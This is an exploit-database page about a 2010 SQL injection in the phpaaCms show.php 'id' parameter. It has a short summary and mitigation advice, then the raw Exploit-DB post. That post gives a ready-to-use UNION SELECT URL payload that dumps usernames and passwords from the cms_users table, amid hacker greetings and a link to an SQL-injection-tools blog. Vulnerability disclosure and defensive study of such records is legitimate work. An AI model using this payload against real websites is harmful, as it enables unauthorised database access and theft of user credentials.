header-logo
Suggest Exploit
vendor:
phpaaCms
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpaaCms
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2010

phpaaCms (show.php?id=) SQL injection Vulnerable

The phpaaCms application is vulnerable to SQL injection through the 'id' parameter in the 'show.php' page. An attacker can inject malicious SQL code through this parameter and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before using it in SQL queries. Additionally, the use of prepared statements or parameterized queries is recommended.
Source

Exploit-DB raw data:

#Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable
# Software http://www.phpaa.cn
# Tested on: win 7
# category: webapp
# Code : n/a
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
 MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       Gr33tz to  All PakISTANI Hackers 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 

 
----- [ Founder ] -----
 
    Shafiq-Ur-rehman
 
----- [ Email] -----
 
    aol.shafiq@gmail.com
 
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 {{{{TITLE}}}
 
PHPAA (show.php) Sql injection Vulnerable
 
+++++[ Vendor ]+++++
 
http://www.phpaa.cn
 
                                                        
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 
----- [ SQL Injection ] -----
 
Put [SQL CODE]
 
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]
 


             {Tested On}
 
----- [ Live Link (s) ] -----
 
[SQLi] http://<server>/show.php?id=1[CODE]
 
[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--
 

 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Thanks To All: www.Exploit-db.com | Ksecurity-team Members| 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     >>Live Long Pakistan<<
 
>>> Live Long Azad Kashmir<<<
 
>>> Proude To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010

Navigation

Suggest Exploit

Services By CQR